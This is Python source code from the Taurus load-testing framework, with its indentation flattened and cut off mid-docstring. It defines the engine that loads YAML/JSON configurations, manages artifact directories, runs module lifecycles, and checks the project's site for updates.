TAURUS_ARTIFACTS_DIR = "TAURUS_ARTIFACTS_DIR"
SETTINGS = "settings"
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(ScenarioExecutor.EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[ScenarioExecutor.EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions:
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "http://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
class Configuration(BetterDict):
"""
loading both JSONs and YAMLs and .properties-like override
dump effective config into files
first config should not contain action prefixes
"""
JSON = "JSON"
YAML = "YAML"
def __init__(self, *args, **kwargs):
super(Configuration, self).__init__(*args, **kwargs)
self.log = logging.getLogger('')
self.dump_filename = None
self.tab_replacement_spaces = 0
self.warn_on_tab_replacement = True
def load(self, config_files, callback=None):
"""
Load and merge JSON/YAML files into current dict
:type callback: callable
:type config_files: list[str]
"""
self.log.debug("Configs: %s", config_files)
for config_file in config_files:
try:
configs = []
with codecs.open(config_file, 'r', encoding='utf-8') as fds:
if self.tab_replacement_spaces:
contents = self._replace_tabs(fds.readlines(), config_file)
else:
contents = fds.read()
self._read_yaml_or_json(config_file, configs, contents)
for config in configs:
self.merge(config)
except KeyboardInterrupt:
raise
except InvalidTaurusConfiguration:
raise
except BaseException as exc:
raise TaurusConfigError("Error when reading config file '%s': %s" % (config_file, exc))
if callback is not None:
callback(config_file)
def _read_yaml_or_json(self, config_file, configs, contents):
try:
self.log.debug("Reading %s as YAML", config_file)
yaml_documents = list(yaml.load_all(contents))
for doc in yaml_documents:
if doc is None:
continue
if not isinstance(doc, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(doc)
except KeyboardInterrupt:
raise
except BaseException as yaml_load_exc:
self.log.debug("Cannot read config file as YAML '%s': %s", config_file, yaml_load_exc)
if contents.lstrip().startswith('{'):
self.log.debug("Reading %s as JSON", config_file)
config_value = json.loads(contents)
if not isinstance(config_value, dict):
raise InvalidTaurusConfiguration("Configuration %s in invalid" % config_file)
configs.append(config_value)
else:
raise
def set_dump_file(self, filename):
"""
Set default file and format to be used by `dump` method
:type filename: str
"""
self.dump_filename = filename
def write(self, fds, fmt):
"""
Write config into opened file
:type fds: file
:type fmt: str
:raise TaurusInternalException:
"""
if fmt == self.JSON:
json_s = to_json(self)
fds.write(json_s.encode('utf-8'))
elif fmt == self.YAML:
yml = yaml.dump(self, default_flow_style=False, explicit_start=True, canonical=False, allow_unicode=True,
encoding='utf-8', width=float("inf"))
fds.write(yml)
else:
raise TaurusInternalException("Unknown dump format: %s" % fmt)
fds.write("\n".encode('utf-8'))
def dump(self, filename=None, fmt=None):
"""
Dump current state of dict into file. If no filename or format
specified, defaults are used
:type filename: str or NoneType
:type fmt: str or NoneType
"""
if not filename:
filename = self.dump_filename
if filename:
if not fmt:
self.dump(filename + ".yml", self.YAML)
self.dump(filename + ".json", self.JSON)
return
acopy = copy.deepcopy(self)
BetterDict.traverse(acopy, self.masq_sensitive)
BetterDict.traverse(acopy, self.replace_infinities)
with open(filename, "wb") as fhd:
self.log.debug("Dumping %s config into %s", fmt, filename)
acopy.write(fhd, fmt)
@staticmethod
def masq_sensitive(value, key, container):
"""
Remove sensitive data from config
"""
if isinstance(key, string_types):
for suffix in ('password', 'secret', 'token',):
if key.lower().endswith(suffix):
if value and isinstance(value, (string_types, text_type)):
container[key] = '*' * 8
@staticmethod
def replace_infinities(value, key, container):
"""
Remove non-string JSON values used by default JSON encoder (Infinity, -Infinity, NaN)
"""
del value
if isinstance(container[key], float):
if math.isinf(container[key]) or math.isnan(container[key]):
container[key] = str(container[key])
def _replace_tabs(self, lines, fname):
has_tab_indents = re.compile("^( *)(\t+)( *\S*)")
res = ""
for num, line in enumerate(lines):
replaced = has_tab_indents.sub(r"\1" + (" " * self.tab_replacement_spaces) + r"\3", line)
if replaced != line:
line = replaced
if self.warn_on_tab_replacement:
self.log.warning("Replaced leading tabs in file %s, line %s", fname, num)
self.log.warning("Line content is: %s", replaced.strip())
self.log.warning("Please remember that YAML spec does not allow using tabs for indentation")
res += line
return res
yaml.add_representer(Configuration, SafeRepresenter.represent_dict)
yaml.add_representer(BetterDict, SafeRepresenter.represent_dict)
if PY2:
yaml.add_representer(text_type, SafeRepresenter.represent_unicode)
yaml.add_representer(str, str_representer)
if PY2:
# dirty hack from http://stackoverflow.com/questions/1447287/format-floats-with-standard-json-module
encoder.FLOAT_REPR = lambda o: format(o, '.3g')
else:
pass # TODO: how to implement it?
class EngineModule(object):
"""
Base class for any BZT engine module
:type engine: Engine
:type settings: BetterDict
"""
def __init__(self):
self.log = logging.getLogger('')
self.engine = None
self.settings = BetterDict()
self.parameters = BetterDict()
def prepare(self):
"""
Preparation stage, at which configuration is being read, configs
and tools being prepared. All long preparations and checks should be
made here, to make `startup` stage as fast as possible.
"""
pass
def startup(self):
"""
Startup should be as fast as possible. Launch background processes,
do some API calls for initiation of actual work. Consider making all
checks and preparations on `prepare` stage.
"""
pass
def check(self):
"""
Check if work should be finished
:rtype: bool
:return: True if should be finished
"""
return False
def shutdown(self):
"""
Stop all processes that were started in `startup` stage.
Should also be as fast as possible, deferring all long operations to
`post_process` stage.
"""
pass
def post_process(self):
"""
Do all possibly long analysis and processing on run results
"""
pass
def _should_run(self):
"""
Returns True if provisioning matches run-at
"""
prov = self.engine.config.get(Provisioning.PROV)
runat = self.parameters.get("run-at", None)
if runat is not None and prov != runat:
self.log.debug("Should not run because of non-matching prov: %s != %s", prov, runat)
return False
return True
class Provisioning(EngineModule):
"""
Base class for any provisioning type. Provisioning is the way to
get the resources that will run the job. For example, local provisoning
means using local machine to run executors, remote means using
remote machines with BZT API nodes on them.
:type executors: list[ScenarioExecutor]
"""
PROV = "provisioning"
def __init__(self):
super(Provisioning, self).__init__()
self.executors = []
self.disallow_empty_execution = True
def prepare(self):
"""
Preparation in provisioning begins with reading executions list
and instantiating ScenarioExecutor classes for them
"""
super(Provisioning, self).prepare()
exc = TaurusConfigError("No 'execution' is configured. Did you forget to pass config files?")
executions = self.engine.config.get(ScenarioExecutor.EXEC, [])
if not executions and self.disallow_empty_execution:
raise exc
for execution in executions:
instance = self.engine.instantiate_module(execution.get("executor"))
instance.provisioning = self
instance.execution = execution
assert isinstance(instance, ScenarioExecutor)
self.executors.append(instance)
class FileLister(object):
"""
A mixin to get required files info from executor
"""
@abstractmethod
def resource_files(self):
"""
Get list of resource files
:rtype: list
"""
pass
class ScenarioExecutor(EngineModule):
"""
:type provisioning: engine.Provisioning
:type execution: BetterDict
"""
RAMP_UP = "ramp-up"
HOLD_FOR = "hold-for"
CONCURR = "concurrency"
THRPT = "throughput"
EXEC = "execution"
STEPS = "steps"
LOAD_FMT = namedtuple("LoadSpec", "concurrency throughput ramp_up hold iterations duration steps")
def __init__(self):
super(ScenarioExecutor, self).__init__()
self.env = Environment(log=self.log)
self.provisioning = None
self.execution = BetterDict() # FIXME: why have this field if we have `parameters` from base class?
self.__scenario = None
self.label = None
self.widget = None
self.reader = None
self.stdout = None
self.stderr = None
self.delay = None
self.start_time = None
self.preprocess_args = lambda x: None
def _get_tool(self, tool, **kwargs):
instance = tool(env=self.env, log=self.log, http_client=self.engine.get_http_client(), **kwargs)
assert isinstance(instance, RequiredTool)
return instance
def has_results(self):
if self.reader and self.reader.buffer:
return True
else:
return False
def get_script_path(self, required=False, scenario=None):
"""
:type required: bool
:type scenario: Scenario
"""
if scenario is None:
scenario = self.get_scenario()
if required:
exc = TaurusConfigError("You must provide script for %s" % self)
script = scenario.get(Scenario.SCRIPT, exc)
else:
script = scenario.get(Scenario.SCRIPT)
if script:
script = self.engine.find_file(script)
scenario[Scenario.SCRIPT] = script
return script
def get_scenario(self, name=None, cache_scenario=True):
"""
Returns scenario dict, extract if scenario is inlined
:return: DictOfDicts
"""
if name is None and self.__scenario is not None:
return self.__scenario
scenarios = self.engine.config.get("scenarios", force_set=True)
if name is None: # get current scenario
exc = TaurusConfigError("Scenario is not found in execution: %s" % self.execution)
label = self.execution.get('scenario', exc)
is_script = isinstance(label, string_types) and label not in scenarios and \
os.path.exists(self.engine.find_file(label))
if isinstance(label, list):
msg = "Invalid content of scenario, list type instead of dict or string: %s"
raise TaurusConfigError(msg % label)
if isinstance(label, dict) or is_script:
self.log.debug("Extract %s into scenarios" % label)
if isinstance(label, string_types):
scenario = BetterDict.from_dict({Scenario.SCRIPT: label})
else:
scenario = label
path = self.get_script_path(scenario=Scenario(self.engine, scenario))
if path:
label = os.path.basename(path)
if not path or label in scenarios:
hash_str = str(hashlib.md5(to_json(scenario).encode()).hexdigest())
label = 'autogenerated_' + hash_str[-10:]
scenarios[label] = scenario
self.execution['scenario'] = label
self.label = label
else: # get scenario by name
label = name
exc = TaurusConfigError("Scenario '%s' not found in scenarios: %s" % (label, scenarios.keys()))
scenario = scenarios.get(label, exc)
scenario_obj = Scenario(self.engine, scenario)
if name is None and cache_scenario:
self.__scenario = scenario_obj
return scenario_obj
def get_raw_load(self):
prov_type = self.engine.config.get(Provisioning.PROV)
for param in (ScenarioExecutor.THRPT, ScenarioExecutor.CONCURR):
ensure_is_dict(self.execution, param, prov_type)
throughput = self.execution.get(ScenarioExecutor.THRPT).get(prov_type, None)
concurrency = self.execution.get(ScenarioExecutor.CONCURR).get(prov_type, None)
iterations = self.execution.get("iterations", None)
steps = self.execution.get(ScenarioExecutor.STEPS, None)
hold = self.execution.get(ScenarioExecutor.HOLD_FOR, None)
ramp_up = self.execution.get(ScenarioExecutor.RAMP_UP, None)
return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
iterations=iterations, duration=None, steps=steps)
def get_load(self):
"""
Helper method to read load specification
"""
def eval_int(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def eval_float(value):
try:
return int(value)
except (ValueError, TypeError):
return value
raw_load = self.get_raw_load()
iterations = eval_int(raw_load.iterations)
ramp_up = raw_load.ramp_up
throughput = eval_float(raw_load.throughput or 0)
concurrency = eval_int(raw_load.concurrency or 0)
steps = eval_int(raw_load.steps)
hold = dehumanize_time(raw_load.hold or 0)
if ramp_up is None:
duration = hold
else:
ramp_up = dehumanize_time(raw_load.ramp_up)
duration = hold + ramp_up
if duration and not iterations:
iterations = 0 # infinite
msg = ''
if not isinstance(concurrency, numeric_types + (type(None),)):
msg += "Invalid concurrency value[%s]: %s " % (type(concurrency).__name__, concurrency)
if not isinstance(throughput, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(throughput).__name__, throughput)
if not isinstance(steps, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(steps).__name__, steps)
if not isinstance(iterations, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(iterations).__name__, iterations)
if msg:
raise TaurusConfigError(msg)
return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
iterations=iterations, duration=duration, steps=steps)
def get_resource_files(self):
files_list = []
if isinstance(self, FileLister):
files_list.extend(self.resource_files())
files_list.extend(self.execution.get("files", []))
return files_list
def __repr__(self):
return "%s/%s" % (self.execution.get("executor", None), self.label if self.label else id(self))
def execute(self, args, **kwargs):
self.preprocess_args(args)
# for compatibility with other executors
kwargs["stdout"] = kwargs.get("stdout", self.stdout) or PIPE
kwargs["stderr"] = kwargs.get("stderr", self.stderr) or PIPE
kwargs["cwd"] = kwargs.get("cwd", None)
kwargs["env"] = self.env
self.start_time = time.time()
try:
process = self.engine.start_subprocess(args=args, **kwargs)
except OSError as exc:
raise ToolError("Failed to start %s: %s (%s)" % (self.__class__.__name__, exc, args))
return process
def post_process(self):
if self.stdout:
self.stdout.close()
if self.stderr:
self.stderr.close()
super(ScenarioExecutor, self).post_process()
class Reporter(EngineModule):
"""
This type of modules is responsible for
in-test and post-test results analysis
"""
REP = "reporting"
def should_run(self):
return self._should_run()
class Service(EngineModule):
"""
This type of modules is responsible for
in-test and post-test results analysis
"""
SERV = "services"
def should_run(self):
return self._should_run()
class Aggregator(EngineModule):
def __init__(self, is_functional):
super(Aggregator, self).__init__()
self.is_functional = is_functional
class Scenario(UserDict, object):
"""
Test scenario entity
"""
SCRIPT = "script"
COOKIES = "cookies"
FIELD_RESP_CODE = "http-code"
FIELD_HEADERS = "headers"
FIELD_BODY = "body"
FIELD_DATA_SOURCES = 'data-sources'
def __init__(self, engine, scenario=None):
super(Scenario, self).__init__()
self.engine = engine
self.data = scenario
def get(self, key, default=defaultdict):
"""
:param key:
:type default: object
:return:
"""
return self.data.get(key, default)
def __getitem__(self, item):
return self.data[item]
def __setitem__(self, key, value):
self.data[key] = value
def __iter__(self):
for item in self.data:
yield item
def __len__(self):
return len(self.data)
def __delitem__(self, key):
return self.data.pop(key)
def get_headers(self):
"""
Returns global headers
:rtype: dict[str,str]
"""
scenario = self
headers = scenario.get("headers", {})
if headers is None:
headers = {}
return headers
def get_requests(self, parser=RequestParser, require_url=True):
"""
Generator object to read requests
:type require_url: bool
:type parser: class
:rtype: list[bzt.requests_model.Request]
"""
requests_parser = parser(self, self.engine)
return requests_parser.extract_requests(require_url=require_url,)
def get_data_sources(self):
data_sources = self.get(self.FIELD_DATA_SOURCES, [])
if not isinstance(data_sources, list):
raise TaurusConfigError("data-sources '%s' is not a list" % data_sources)
for index, _ in enumerate(data_sources):
ensure_is_dict(data_sources, index, "path")
return self.get(self.FIELD_DATA_SOURCES, [])
class HavingInstallableTools(object):
@abstractmethod
def install_required_tools(self):
pass
class Singletone(object):
pass
class SelfDiagnosable(object):
@abstractmethod
def get_error_diagnostics(self):
"""
:rtype: list[str]
